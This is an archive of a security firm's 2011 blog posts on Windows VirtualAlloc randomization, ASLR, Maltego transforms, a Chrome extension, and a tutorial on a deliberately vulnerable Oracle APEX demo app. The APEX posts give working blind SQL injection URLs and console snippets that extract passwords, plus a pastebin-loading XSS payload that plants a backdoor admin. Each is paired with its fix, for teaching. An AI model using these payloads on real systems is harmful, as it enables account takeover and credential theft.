Tuesday, 27 December 2011

Introducing VirtualAlloc_s - A Potentially SDL Friendly Version of VirtualAlloc

As a follow-on from our previous post on VirtualAlloc and its lack of randomization, and inspired by what the Chromium team did in their OS::Allocate function, we decided to sit down and write our version: VirtualAlloc_s. At this point it is only polite and fair to also tip the hat to Didier Stevens' work published in August and September 2011, which documented the EMET randomization [1][2][3] and his pseudo Address Space Layout Randomisation (ASLR) implementation.

Our VirtualAlloc_s and VirtualAllocEx_s functions are similar to Microsoft's other _s-suffixed safe versions of otherwise unsafe functions. The implementations are contained in a single header file and are designed as drop-in replacements for any existing calls to VirtualAlloc or VirtualAllocEx.

At a high level the implementation tries to randomize the address requested from VirtualAlloc (if the developer has not explicitly requested one). If the allocation fails, for example because the address is invalid or already allocated, the implementation falls back to using VirtualAlloc as-is, but alternates (after a random number of executions) between bottom-up and top-down allocations. This fallback has the benefit of being guaranteed to work whilst still adding some unpredictability, and we think this behaviour is a very slight improvement over Google's solution to the problem. The finer details of the implementation are described below.

On the first call to VirtualAlloc_s or VirtualAllocEx_s the implementation initializes itself. This initialization seeds rand with the current PID, tick count and available RAM; randomly selects the number of executions (between 1 and 3) after which it will switch between bottom-up and top-down allocations in the fallback scenario; and selects whether it will start fallback in bottom-up or top-down mode. It also performs one low and one high allocation of the size requested by the user; these additional allocations are designed to add a little more entropy to the fallback scenario. Once initialized, on each subsequent call the implementation generates a random address, attempts the allocation at that address and, if the allocation fails, falls back to the safe mode described previously.
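The address generation step can be sketched in portable C. This is an illustration only, not the actual VirtualAlloc_s code: random_candidate and its range arguments are names we've invented here, and the real implementation seeds rand as described above and then probes the candidate with VirtualAlloc, falling back if the probe fails.

```c
#include <stdint.h>
#include <stdlib.h>

/* Windows allocation granularity: VirtualAlloc rounds requested base
   addresses down to 64KB boundaries, so candidates should be 64KB aligned. */
#define ALLOC_GRANULARITY 0x10000ULL

/* Pick a random, granularity-aligned candidate address in [lo, hi).
   Sketch only: the real code also handles 32- vs 64-bit address ranges
   and retries/falls back when the resulting allocation fails. */
uintptr_t random_candidate(uintptr_t lo, uintptr_t hi)
{
    uint64_t slots = (uint64_t)(hi - lo) / ALLOC_GRANULARITY;
    if (slots == 0)
        return lo; /* range smaller than one granule: nothing to randomize */

    /* Combine two rand() calls for more than 15 bits of entropy. */
    uint64_t r = ((uint64_t)rand() << 32) ^ (uint64_t)rand();
    return lo + (uintptr_t)((r % slots) * ALLOC_GRANULARITY);
}
```

The returned address would then be passed as the lpAddress hint to VirtualAlloc; a NULL return from that call triggers the fallback path.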

We've tested the implementation using a number of unit tests covering performance overhead, thread safety, uniqueness of addresses and bias towards specific addresses. Performance-wise, no noticeable overhead was observed in our unit test cases.

During an extended run (exceeding 110,000 iterations of the unit test cases on Windows 7 as a 32-bit process) we recorded 2,048 different addresses being allocated. With regard to distribution, while not perfectly uniform, we generally observed a good spread across the address space, as shown below:

In a similar run (exceeding 160,000 unit test cases on Windows 7 as a 64-bit process) we observed 4,093 different addresses being allocated. Once again the distribution is not perfectly uniform; however, from a subjective perspective, a good distribution was observed across the address space.

Our proof of concept implementation is compatible with both 32-bit and 64-bit platforms and is thread safe. However, we make no warranties, implied or otherwise, that by using our implementation you won't run into issues, will actually gain any extra security, or won't inadvertently introduce new security issues (the lawyers wrote that bit).

For developers looking to use the implementation, it should simply be a case of searching and replacing existing calls to VirtualAlloc/VirtualAllocEx. However, keep in mind that any static libraries or DLLs your code uses won't benefit unless they are rebuilt to use the new header. If you don't have the code for these components you'll need to work with your technology provider to get them to adopt it.

We've made all the code and materials associated with the implementation and testing available for download and additional peer review. If you spot any mistakes or have any other feedback, please feel free to get in touch with us.

Finally, with regard to licensing: as we did borrow (copy) some of the Google V8 team's code, the implementation falls under the BSD license, so it is usable by pretty much anyone; but please check to make sure it's compatible with your current policies and licensing.

Wednesday, 21 December 2011

Breaking the Inevitable Niche/Vertical Technology Security Vulnerability Lifecycle

One of the observations we’ve made over the past fifteen years or so is that things have only slightly improved with regard to new, niche or vertical-specific technologies, security and the inevitable vulnerability lifecycle. By this we mean niche and vertical software vendors achieving the utopia of building robust security throughout the development lifecycle in order to reduce, mitigate and sustain software security (aka an SDL).

Instead we live in a world where market forces almost dictate that security is taken seriously only once a product or market has matured, or early exposure has been gained and has come to the attention of researchers and/or regulators. While SDLs have become a hot topic over the last ten years, the reality is that organizations don't see security as a measure of quality but as a cost. So getting a 'minimum viable product' to market under time and market pressures is often still the reality, especially in markets where security hasn't previously hurt the business.

This might sound like a ridiculous statement, but bear with us. If we look at what typically happens with a new technology or market that successfully matures, we see the following lifecycle:

The net result is that vendors don’t have an incentive to front-load their investment in security until they know their entry into an existing market, or the establishment of a new market, is going to be a success. The reality is that if your products are not a success it's unlikely security researchers will look at them (exceptions can exist), so you won’t be getting pressure from clients about security (other than perhaps superficial marketing buzzword-bingo requirements).

So this leads us to the inevitable vulnerability lifecycle for successful and initially less common or niche technologies:

If you think we’re just spinning a line, we've seen some really good examples over the past ten years or so. Essentially, it's a snowball effect: a technology piques the interest of a security researcher or academia (or a funded programme is created); time is invested, papers are released and presentations are given. This in turn raises the profile of the technology and its weaknesses, which increases the pressure on the technology and its vendor.

Even technologies considered obscure or inaccessible will, over time, become the subject of scrutiny and security research. Independent researchers can obtain indirect funding for their time (via programmes such as ZDI), or academia can invest, which permits access to software or hardware the vendor may consider out of reach. Additionally, where there is a drive within the community to create an open-source implementation, it can typically be re-purposed for security research. A great example here is OpenBTS/OpenBSC and everything it led to in the field of active GSM/GPRS research: a technology previously considered out of reach by vendors and industry bodies is methodically picked apart. We can expect that future technologies won't take twenty years (as GSM did) to come under such close scrutiny.

Examples of technologies that we've had direct experience with that have followed this cycle include:
  • Cellular application protocols (WAP, SMS, MMS etc).
  • GSM, GPRS and 3G networks.
  • Mobile operating systems.
  • Mobile handset cellular baseband.
  • Bluetooth.
  • In car telematics.
  • SCADA.
  • Fixed line telecommunication equipment.
There are others we don’t have direct experience of, yet they have also followed the same cycle:
  • Embedded healthcare technology.
  • Smart grid (arguably a derivative of SCADA).
In each of these cases it wasn’t a question of IF there were security vulnerabilities, but of which security researcher was going to get access to the technology first, find vulnerabilities and publish. It is hard to believe that vendors consider a 'lack of technology access' a suitable security stop-gap until such time that market or regulatory forces demand that security issues be fixed and a mature SDL be deployed.

An example of the frustration felt in some quarters can be seen in emerging themes from the US government such as DIS (Designed-in Security).

So if you’re a vendor and you’re starting to receive reports of security vulnerabilities in your products, it means you’re reaching a stage of market penetration where you need to re-invest some of the return and start paying back the security debt you've incurred to achieve success. For future products, deployment of a lightweight SDL will likely occur to try and regain control of the security balance.

However, the reality is that vendors will likely only ever deploy a full SDL if there is a material effect on their business because of security. This material effect could be regulatory, customer or market differentiation driven.

For the security research community, much like the great explorers it’s a continual race to find the new land of opportunity; a land where new vulnerabilities are easily found and a technology is ripe for exploitation.

So in summary: hardware and software security cannot be ignored, no matter how niche or vertically aligned the technology. If we ignore security we're laying eggs that, if the technology or market is successful, will turn into bugs (of the security kind) being reported. These bugs may in time lead to a full-on infestation which fatally undermines the security of the product. To break this cycle we need to treat not only the immediate host of the bugs (the software) but also the environment (development practices) to stop re-infestation (through component re-use) of future products.

Monday, 19 December 2011

Maltego for Windows Binary Analysis – Identifying Vendor Trust Relationships

So we've been working with Maltego on and off for a couple of years now to see how we can develop new transforms that add value and extend its functionality in useful ways. This has led to us experimenting a lot with small ideas (and some larger ones, but you’ll have to wait for those).

One of the ideas we had was: wouldn't it be useful to use the Maltego visualisation and data-mining engine on Windows binaries? This is a cool concept, but what useful information could we extract? Some brainstorming later, we realised that in modern software development the end products we install can be made up of software components from many different vendors. So we thought that if we extracted this information we could start seeing relationships between:
  • Software publishers
  • Code signers
  • Geographic locations
  • Third/fourth party component providers

So we wrote a set of prototype Maltego local transforms to extract information from Windows binaries. The ones we created are:
  • Code signer and vendor company (from signature and binary details)
  • Binaries signed/produced by a company (inverse of the above)
  • Calculating file hashes
  • String extraction

As we said, the goal was really to prove an idea and understand the value of both the visualization and the ability to leverage Maltego’s existing transforms to further mine data and relationships relating to binaries. We see these plug-ins being used as-is by organizations wishing to:
  • Understand the make up in terms of software publishers of an application / package
  • Identify code trust relationships between organizations
  • During malicious code analysis to identify sources of strings found in a binary (i.e. code fragments)

Anyway, without further ado, we've put together a rough little demo video of some of the transforms we wrote to give you an idea.

During development we also wrote a C# helper class to expedite local transform development; with it, a very basic test case becomes just a few lines.

So that's it: idea to prototype in a single blog post.

If you’re interested in these plug-ins and what we’re doing with Maltego, feel free to drop us an e-mail at maltego@recx.co.uk or contact us via Twitter @RecxLtd. We’ll happily share the plug-ins as-is, with source code, with interested parties.

Tuesday, 13 December 2011

The Curious Case of VirtualAlloc, ASLR and an SDL

So Address Space Layout Randomization (ASLR) is becoming an increasingly common way, on multiple platforms, not to resolve security issues but to frustrate their exploitation. While doing a bit of further research into ASLR on Microsoft Windows 7 one weekend, we tripped across some behaviour that was a revelation to us: VirtualAlloc is not subject to ASLR on Windows, unlike HeapAlloc and malloc. This is surprising considering that:
  • This behaviour is not documented on MSDN
  • This API is not on the Microsoft banned API list
  • Vendors can use VirtualAlloc to allocate memory read-execute, write-execute and read-write-execute

This obviously represents a risk if misused by software vendors, and it may not be flagged as bad even if the most rigorous of SDLs is adhered to. Why is this behaviour a risk? VirtualAlloc could potentially undermine the effectiveness of ASLR (when used) and create the break an aggressor needs.

So we then went looking to see who else was aware of this behaviour. We only found a single public reference, in Chris Rohlf’s and Yan Ivnitskiy’s Matasano paper titled ‘Attacking Clientside JIT Compilers’ from the summer. In this paper the authors state:

“However, the VirtualAlloc call on Win32 is not randomized by default and will return predictable allocations of contiguous memory at offsets of 0x10000 bytes. Fortunately, VirtualAlloc takes an optional argument indicating the desired page location to allocate. Creating a randomization wrapper around VirtualAlloc to simulate mmap’s existent behaviour should be a straightforward process.”

So, armed with this, we thought it would be useful to understand how prevalent the use of VirtualAlloc with memory protection constants such as PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY was. We decided to use 'cloud grep', aka Google Code Search.

Numerous examples were found in many different projects, including:

One of the more interesting implementations is in Google’s Chromium where they take heed of Chris's and Yan’s advice. 

So this is a really positive outcome: the vendor understands the risk, implements a mitigation and moves on. Next we went on to binaries. We did a quick audit of files on one of our Windows 7 machines, which included Office 2010, and noticed that MSO.DLL uses the function.

Now, for this to be of concern to us, 40h or 80h needs to be passed as the last parameter to VirtualAlloc: 40h is PAGE_EXECUTE_READWRITE and 80h is PAGE_EXECUTE_WRITECOPY. Looking through MSO.DLL we find at least one example where this occurs:

From this we know that Microsoft Office allocates memory that is RWX using VirtualAlloc in an otherwise ASLR-enabled binary. This by itself is not a vulnerability, but knowing the behaviour exists means there is light at the end of the tunnel if you're trying to bypass ASLR.
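For reference, the protection constants in play (their values are as defined in winnt.h) and the kind of small check a review tool might apply; is_writable_executable is our illustrative name, not anything from the Windows SDK:

```c
/* Win32 memory protection constants, as defined in winnt.h. */
#define PAGE_EXECUTE           0x10
#define PAGE_EXECUTE_READ      0x20
#define PAGE_EXECUTE_READWRITE 0x40
#define PAGE_EXECUTE_WRITECOPY 0x80

/* Flag protections that are simultaneously writable and executable:
   the 40h and 80h values worth hunting for in a code or binary audit. */
int is_writable_executable(unsigned int protect)
{
    return protect == PAGE_EXECUTE_READWRITE ||
           protect == PAGE_EXECUTE_WRITECOPY;
}
```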

We had a chat with Microsoft about the behaviour of VirtualAlloc. They were good enough to point out that there are numerous factors in the real world that could cause some randomization. These factors include the bottom up randomization in EMET, as documented by Didier in his post Bottom Up Randomization Saves Mandatory ASLR.

Anyway, in conclusion, we see a number of instances where VirtualAlloc is used in a potentially dangerous manner in the real world by a variety of software vendors. While some vendors (credit to Google) mitigate the lack of randomness, not all do. Google and Microsoft are also not the only vendors to use this functionality; there are, and will continue to be, others. In short, this is something to add to your grep strings when doing code reviews, in order to flag it to development teams and ensure they're aware and mitigate appropriately.

We've released an SDL friendly version of VirtualAlloc called VirtualAlloc_s.

Friday, 14 October 2011

Securing Oracle Apex - Big Bad Blog - Part 2

Welcome back, this week we will be discussing another page of the Big Bad Blog. If you haven't read part 1 it might be a good idea to start there.

Just another reminder to ensure that you have downloaded the free version of ApexSec through the ApexSec Online Portal. If you want to try out the exploits then you should import the Big Bad Blog into a workspace and run it.

Page 12 - Manage Users

This week we will be discussing the 'Manage Users' page; it might seem as though we have skipped a few pages (we'll get back to those). Here at Recx we review a lot of applications for our clients, and this has to be absolutely the most common vulnerability that we find. So, with that in mind, we will continue...

Cross-Site Scripting - Report Display Type


When we sign into the Big Bad Blog with an administrator account we have the option to click on the 'Manage Users' tab. We are then shown a report page with a list of users: administrators are shown in red and normal users in blue.
Because the code in the report outputs HTML in the select statement to change the colour, the report column cannot be set to 'Escape Special Characters'. If we look at the code, it appears that the developer has quite rightly escaped the values using htf.escape_sc.

However, if we tell ApexSec to highlight the instance (by clicking on the down icon), it becomes apparent where the vulnerability is.

As we can see, the else clause in the case statement is at fault: if the column isadmin is set to null the vulnerability manifests itself. It just so happens that all newly created users have the isadmin column in the database table set to null; this is a bug in the code, but it serves us well here.

Note: This condition is made more serious in that an exploitable condition in a low-security domain (normal user) affects a higher domain (admin).


As the field sizes are quite small we will need to transfer our exploit code from another server; Pastebin is excellent for this purpose, so we will place our exploit payload there.

We then go to the 'Add User' page of the Big Bad Blog and add a username of <script src="http://pastebin.com/raw.php?i=nbj5a2mE"></script>. If you have created your own pastebin script then obviously use your own unique id.

A bug in the Big Bad Blog results in the following message being displayed when the user is added.

The account has been created, and this error message can safely be ignored.

Exploit Trigger

When the administrator visits the 'Manage Users' page the exploit will run. We can sign in with the credentials username: admin password: admin and visit the 'Manage Users' page.

The exploit isn't very subtle, as you can see the HTML, but it serves our purpose here. After waiting about 5 seconds (do not refresh the page), sign out of the administrator account and return to the login screen by using the logout link at the top right of the page.

Now that we are back at the login screen, we can log in with the newly created 'backdoor' administrator user, with a password of 'hi'.

Correcting the code

Simply escaping the username in the case statement by using htf.escape_sc ensures the vulnerability is corrected.
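A sketch of what the corrected report column might look like. The table and column names here are our reconstruction of the Big Bad Blog, not an exact copy of its code; the key point is that every branch, including the else clause, escapes the username:

```sql
-- Illustrative reconstruction: htf.escape_sc applied in all branches.
select case
         when isadmin = 1 then
           '<span style="color:red">'  || htf.escape_sc(username) || '</span>'
         when isadmin = 0 then
           '<span style="color:blue">' || htf.escape_sc(username) || '</span>'
         else
           htf.escape_sc(username)   -- the branch the original code missed
       end as username
  from users
```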

Note: Have you already corrected the code in the Big Bad Blog? Want to check your changes? Use our ApexSec Online Portal! Just re-export your fixed Big Bad Blog, upload it into the portal and use your free credits to access the report and ApexSec project file.


Getting the report columns correct can be quite tricky; blindly setting the report column type to 'escape special characters' quickly breaks applications when double escaping occurs.

As can be seen from the example above, under the right circumstances the effect of this can be devastating, with privilege escalation being a common attack vector.

Only ApexSec can identify issues where the report column needs to be set to a standard report column because of HTML constructs being passed up from the underlying code.

If you want to discuss how to make your Oracle APEX applications secure, feel free to get in touch.

Follow us on twitter to be the first to hear about part 3.

Thursday, 6 October 2011

Securing Oracle Apex - Big Bad Blog - Part 1

Are you looking for part 2 ?

We have created the 'Big Bad Blog' based on common security problems that we have found in many of the applications we have reviewed. This APEX 4.1 application is freely available to download. Import it into your own workspace on apex.oracle.com or your own site (do not use it in a shared workspace or on sensitive systems). As we work through the security conditions and the appropriate fixes you should be able to identify various coding practices that are unsafe.

Followers of this series will have the opportunity to try out our ApexSec product and work through the examples to swiftly identify security problems within the application.

Before we start ensure that you have downloaded the free version of ApexSec by signing up for the ApexSec Portal and accessing the relevant version for your platform from the Security Console section. If you want to try out the exploits then you should have imported the Big Bad Blog into a workspace and run it.

Page 1 - Messages

This page is the core page of the Big Bad Blog. It is typical of the type of code which is old and complicated: nobody dares to touch it, and all changes have been bolted on over time. The entire page should be redesigned but there is no time; the biggest such page we have seen exceeded 150 lines of code.

Running ApexSec on this page reveals several security issues, which is quite typical for APEX code written in this manner. As our application is quite small and we have compacted a lot of vulnerabilities into it, these vulnerabilities might seem obvious to you. Imagine a large app with 60+ pages: how long would it take? This is where ApexSec's cost savings can be found.

SQL Injection - Cursor Open Statement

As this is considered the most serious of web-based vulnerabilities we will cover it first. In ApexSec we select the 'Cursor Open' SQL Injection entry on the tree. ApexSec loads the offending SQL into the SQL viewer and enables you to move through the issues with the navigation buttons.

ApexSec shows quite clearly where the problematic concatenation occurs: in this case the items P1_AUTHOR and P1_SHOW are unsafely concatenated into SQL which is passed to the open for statement.


In this case the injection can occur by simply manipulating the URL, and this would lead to the compromise of a user's password.

http://apex.oracle.com/pls/apex/f?p=<your app id>:1:<your session id>::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,1,1) = 'b')\

The request above would display the blog entries if the guessed password character was correct. We can then work through the password of the bob account by amending the substr statement. Paste these in immediately after the session id.

::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,1,1) = 'a')\

::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,1,1) = 'b')\

::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,2,1) = 'a')\

::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,3,1) = 'a')\

::NO::P1_SHOW:\5 AND EXISTS (select username from users where username = 'bob' and substr(password,3,1) = 'b')\

The password is found to be 'bab' and the account is compromised.

Correcting the code

In this case the fix is to apply the using clause to the open for statement to properly bind the variable (in this case it is slightly more tricky due to the dynamic nature of the query).
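A sketch of the shape of the fix. The query text and column names here are illustrative, not the Big Bad Blog's actual statement; the point is that the item value is bound rather than concatenated:

```sql
-- Illustrative only: P1_SHOW supplied as a bind variable via using.
open cur for
  'select id, title, body from messages where id <= :show'
  using v('P1_SHOW');
```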

SQL Injection - Execute Immediate Statement

Examining the code in the delete_message page process reveals a very similar vulnerability with the execute immediate statement.

In this case it is the AJAX call that is vulnerable, with a very similar concatenation error to the open for vulnerability.


The easiest way to fire AJAX calls at APEX is to use the jQuery interface. This can be done using the JavaScript console (in Firefox: Tools -> Web Console; in Chrome: Tools -> JavaScript Console).

The following JavaScript, typed into the console, will delete a message if the password begins with 'a'. The exploit is exactly the same as before, but with a slightly different attack vector.

var get = new htmldb_Get(null,<app id>,'APPLICATION_PROCESS=delete_message',1);
get.addParam('x01','<message id> AND EXISTS (select username from users where username = \'bob\' and substr(password,1,1) = \'a\')'); 
gReturn = get.get();
<app id> should be set to the application id; <message id> should be retrieved from the HTML source of the page. Searching for "Alice Greeting" should reveal the following source (the message id is highlighted in red):

<B>Alice Greeting</B>
by <i>alice</i>
<a href="javascript:location.reload(true)" onClick="JavaScript:var get =
new htmldb_Get(null,<app id>,'APPLICATION_PROCESS=like_message',1);
get.addParam('x01','241');gReturn = get.get();">Like</a>
<p>Hi, I am Alice a normal user that can create posts, my password is

So a similar sequence as before should reveal the password one character at a time. Submit the following:

var get = new htmldb_Get(null,<app id>,'APPLICATION_PROCESS=delete_message',1);
get.addParam('x01','241 AND EXISTS (select username from users where username = \'bob\' and substr(password,1,1) = \'a\')');
gReturn = get.get();

Reload the page; nothing happens (the password does not begin with 'a'). Then:

var get = new htmldb_Get(null,<app id>,'APPLICATION_PROCESS=delete_message',1);
get.addParam('x01','241 AND EXISTS (select username from users where username = \'bob\' and substr(password,1,1) = \'b\')');
gReturn = get.get();

Reload the page and the "Alice Greeting" message will be deleted; therefore the first character of the password is 'b'.

Correcting the code

Again it is a case of properly binding the variable into the execute immediate statement as follows.
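A sketch of the bound version. The statement text is our reconstruction rather than the Big Bad Blog's actual code; apex_application.g_x01 is the standard APEX global holding the AJAX x01 parameter:

```sql
-- Illustrative only: the message id arrives via x01 and is bound,
-- never concatenated into the statement text.
execute immediate
  'delete from messages where id = :msg_id'
  using to_number(apex_application.g_x01);
```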

Cross-Site Scripting

The first two instances of cross-site scripting are quite simple: outputting directly to the HTTP stream via htp.p calls without escaping is generally a bad idea.

Here the two variables title and author are pulled from the cursor and output directly; this leads to the vulnerability. If we move forward to the third instance we can see a similar error, but this time it is the result of a concatenation.

All three instances are exploitable but we will concentrate on the third instance.


Note: Some browsers (notably Chrome) may block this very simple XSS; code should not rely on browser features to protect the site.

As we found the password for 'bob' earlier, we might as well abuse this account. Log in with username 'bob' and password 'bab'. To exploit this cross-site scripting vulnerability we need to change the full name using the My Details tab in the Big Bad Blog.

Then, when we 'like' a post in the blog, the vulnerability will be executed. This is an over-simple example of an exploit, but this is a blog post about detection, not exploitation.

Correcting the code

Any variables that arrive from the database or from user input should be escaped using the htf.escape_sc function; this will ensure that any HTML tags and features are adequately escaped before being output to the stream.
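A minimal sketch of the corrected output, assuming local variables named l_title and l_author (our names, matching the title and author values described above):

```sql
-- Illustrative only: escape every value before it reaches htp.p.
htp.p('<B>' || htf.escape_sc(l_title) || '</B> by <i>'
            || htf.escape_sc(l_author) || '</i>');
```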

Page Access Protection

APEX provides protection against URL manipulation through Session State Protection (SSP), where the URL is protected by a checksum so the parameters cannot be modified. However, this should not be used to mitigate the underlying dangerous PL/SQL and the SQL injection issue. In fact, if we enabled SSP on this page, the issue would still be exploitable by setting the P1_SHOW variable on any other page that did not have SSP enabled.

On the Messages page security settings we will set Page Access Protection to 'Arguments Must Have Checksum' and at the same time turn off the Autocomplete feature.

Item Protection

Using Item Protection on P1_SHOW and P1_AUTHOR will only protect these items from URL tampering. We will set the item protection to 'Checksum Required'.

Any attempt to manipulate these values via the URL, as earlier in this tutorial, will be correctly blocked by the APEX framework. However, utilising the client-side framework we can still submit the changes:


Using the JavaScript console, we can change the pull-down combo box into an input box in the browser (there are many ways to achieve the same effect):

a = document.getElementById('P1_SHOW');
b = document.createElement('INPUT');
b.setAttribute('type', 'text');
b.setAttribute('size', '85');
b.id = a.id;
b.name = a.name;
a.parentNode.appendChild(b);
a.parentNode.removeChild(a);

We can then submit the SQL injection as before. It is worth noting that all the security features of APEX are now fully activated; only the deep analysis engine of ApexSec will find the outstanding vulnerabilities in the code.

Public Page

ApexSec has no way of knowing whether you intended to make a page public; usually only a handful of pages are meant to be served to unauthenticated users. The Messages page should be public, so this report item can be ignored.

Other Problems

There are logic problems that ApexSec will not find (and never will): flaws where the application does not operate as intended.

One example is the delete_message page process. The way the process is coded means that any user can delete other users' messages; this is clearly not the intention of the application.

The login username is displayed on posts; this would be highlighted in our security reviews. Once again, an automated scan would not help here.

The passwords are kept in the clear in the database; this is clearly bad practice and cannot currently be detected by ApexSec.

Using ApexSec does not remove the requirement for a manual review. With issues such as those documented above eliminated by developers through use of ApexSec throughout the development lifecycle, the manual review effort can be more focused and cost-effective.


Although the code we are showing can easily be dismissed with "we wouldn't code like that" and "that's not how to do it", these examples are based on real-world code. Some APEX code is old and, because "it just works", nobody has taken a fresh look at its security posture.

At Recx we perform manual security audits of APEX code; over the past 18 months we have developed tools and techniques which we consider to be currently unique. ApexSec is the automation of a selection of these techniques. We do not profess to be APEX feature experts or Oracle experts; we have a single focus: security. We devote our time to securing APEX code via detection and analysis.

If your business runs APEX code in production systems, or if you have had non-permanent staff working in your code base, then a code review will give you peace of mind that the code running on your servers at least meets your required security standard.

Monday, 8 August 2011

How We Built the Recx Security Analyzer Chrome Extension

It’s not rocket science
The purpose of this post is to demonstrate that usable security tools don’t need to be rocket science, and hopefully to inspire those of you with other ideas to write your own browser extensions. The reason we wrote the Chrome extension in the first place was that we felt there were a number of low-hanging-fruit security attributes that should be accessible to development and quality assurance processes in a clear and easily understandable manner. We've also already had feedback from security professionals that they sometimes forget to look for these issues, and that simple functions accessible in their browser are a good way to ensure they are consistent.

Why a Chrome extension?
The reason we chose to write a Chrome extension was really twofold. The first is that development and QA already use a browser, so why not make the tool accessible via something users are already familiar with? The second was the thinking that Google’s Chromium team have done all of the heavy lifting, implementing HTTP, SSL/TLS, the DOM, the JavaScript engine, cookies etc. and provided programmatic access to the browser. So why would we want to reinvent the wheel in a no doubt lacklustre fashion over many months (if not years) and be plagued with corner cases and related dramas? The ideas we discounted included:
  • Writing a web security proxy or plug-in for an existing one. Discounted as we thought it would not be as intuitive or quick to install, set-up and use on a daily basis by non dedicated staff.
  • Writing it in C, Java, C#, or Python. Discounted as we thought parsing everything and building a UI would be a lot of work for no benefit. We did look at some Java / C# web browser libraries and felt they would be filled with the corner cases we mentioned, due to their inability to keep up with the development speed of modern browsers. The Internet Explorer COM object, meanwhile, is a pig to work with that doesn't always easily expose everything we wanted (that prototype is in the hours-wasted bin).
The extension’s components
So, the extension is made up of three components: the background element, the content element and the main popup element. All three perform distinct functions, which are described in detail below.

The background element
The background element is used to register the right-click context menus and the call-back that handles these events. When the user clicks on a context menu entry the call-back is executed, the type of request is determined and the URL obtained. A new tab is then created containing an instance of the popup element, at which point all control is handed to the popup for further processing. We encode the Chrome tab ID and the URL of the page, frame or link being analysed into the popup's request parameters as a simple method of IPC.
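As a rough sketch of how that hangs together (the function name, menu titles and URL layout here are illustrative, not the extension's actual code; the API shown is the pre-Manifest-V3 context menu API):

```javascript
// Pure helper: smuggle the tab ID and target URL to the popup via its
// request parameters -- our poor man's IPC between the components.
function buildPopupUrl(tabId, targetUrl) {
  return 'popup.html?tab=' + encodeURIComponent(tabId) +
         '&url=' + encodeURIComponent(targetUrl);
}

// Chrome-only glue, guarded so the helper above remains testable outside
// the browser: register a context menu per context and, on click, open
// the popup in a new tab and hand control over to it.
if (typeof chrome !== 'undefined' && chrome.contextMenus) {
  ['page', 'frame', 'link'].forEach(function (context) {
    chrome.contextMenus.create({
      title: 'Analyse this ' + context,
      contexts: [context],
      onclick: function (info, tab) {
        // Pick whichever URL matches what the user right-clicked on.
        var url = info.linkUrl || info.frameUrl || info.pageUrl;
        chrome.tabs.create({ url: buildPopupUrl(tab.id, url) });
      }
    });
  });
}
```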

The page content element
The page content element is used to parse the DOM of the requested page (as seen by the user). This is broken out into two main functions. The first enumerates all of the page’s meta headers looking for security-related attributes. The second parses the page looking for forms and form elements. These two functions build an object containing the results, ready to pass to the popup element. In order to reduce non-essential page load overhead we don’t execute this on every page load; instead we only inject and execute this extra code on a case-by-case basis when the user requests it. We found this had a profound impact on general Chrome performance and seemed to make us good browser citizens. Finally we register an IPC event listener that waits for the popup element to request the newly built results object, and returns it when asked.
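A minimal, DOM-free sketch of those two passes (the attribute checks and field names are our illustration, not the extension's actual logic; in the content script the inputs would come from the live DOM rather than plain objects):

```javascript
// Build the results object from already-extracted meta tags and forms.
// Working over plain objects keeps the logic testable outside Chrome; in
// the real content script the inputs would come from
// document.querySelectorAll('meta') and document.forms.
function analysePage(metas, forms) {
  var results = { metaHeaders: [], passwordFieldsWithAutocomplete: 0 };

  // Pass 1: security-related attributes delivered via meta http-equiv.
  metas.forEach(function (m) {
    if (/content-security-policy|x-frame-options/i.test(m.httpEquiv || '')) {
      results.metaHeaders.push({ name: m.httpEquiv, value: m.content });
    }
  });

  // Pass 2: form elements, e.g. password fields left open to autocomplete.
  forms.forEach(function (f) {
    f.elements.forEach(function (el) {
      if (el.type === 'password' && el.autocomplete !== 'off') {
        results.passwordFieldsWithAutocomplete++;
      }
    });
  });
  return results;
}
```

The content script would then register its message listener and hand this object back whenever the popup asks for it.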

The popup element
The popup is the main component and holds the majority of the logic and all of the user interface. It is what appears under the Recx icon when the user clicks it, or in a new tab when the user uses the right-click context menu. The popup then does the following things:
  • Works out how it was called (browser icon versus right-click context menu), the URL being analysed and the tab ID.
  • Performs an XMLHttpRequest to the URL requested, so inheriting any session cookies in order to obtain the HTTP headers from the server. Analyses any security related HTTP headers and builds the UI with the results. It also then builds the ‘All HTTP headers’ hidden DOM element for advanced users.
  • Enumerates all cookies within Chrome looking for those cookies that relate to the URL requested. Analyses them and builds the UI with the results. It also then builds the ‘All cookies’ hidden DOM element for advanced users.
  • Injects our content element into the Chrome tab for the page requested, using the tab ID. Chrome provides a way for us to inject this content element not into the actual page but into a container which has full access to the page’s DOM. This then performs the operations described previously to analyse the DOM for security issues.
  • Sends a request via Chrome IPC to our content element for a copy of the results object and then receives it via an asynchronous call-back. Analyses the returned object for any security issues and builds the UI with the results.
  • Finally the popup element builds the rest of the UI using a mixture of JavaScript and DHTML and makes it visible to the user.
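The header-analysis step above lends itself to a couple of small pure functions. In this sketch (the header list and function names are illustrative, not the extension's actual code) the raw string comes from xhr.getAllResponseHeaders(), which returns CRLF-separated "Name: value" lines:

```javascript
// Security headers we look for; an illustrative subset, not the
// extension's actual checklist.
var SECURITY_HEADERS = ['x-frame-options', 'strict-transport-security',
                        'x-content-type-options'];

// Parse the raw getAllResponseHeaders() string into a name -> value map,
// lower-casing names so lookups are case-insensitive.
function parseHeaders(raw) {
  var headers = {};
  raw.split(/\r?\n/).forEach(function (line) {
    var idx = line.indexOf(':');
    if (idx > 0) {
      headers[line.slice(0, idx).trim().toLowerCase()] =
        line.slice(idx + 1).trim();
    }
  });
  return headers;
}

// Flag any security headers the server did not send.
function missingSecurityHeaders(headers) {
  return SECURITY_HEADERS.filter(function (h) { return !(h in headers); });
}
```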

And ‘ta-da’, the user is then presented with the results. All the strings are actually pulled in from a locale file, so if we ever want to dust off our schoolboy German, Spanish or French (or put our faith in Google Translate) we can in theory easily support different languages.

Time and effort spent
We thought it might be interesting to provide a breakdown of the time we spent developing the extension (but not the upfront research / wasted prototype code). We're going to caveat all of this by saying that we've never written a browser extension before, haven't written a tremendous amount of JavaScript recently and aren't intimately familiar with all the properties of every DOM object. The breakdown below is for all effort to date across the team. In this time we've had three releases: the initial release, a spelling patch (doh!) and a new feature release.
  • Reading how to use the Chrome extension API: ~ 8 hours
  • Reading up on DOM element properties: ~2 hours
  • Writing code: ~14 hours
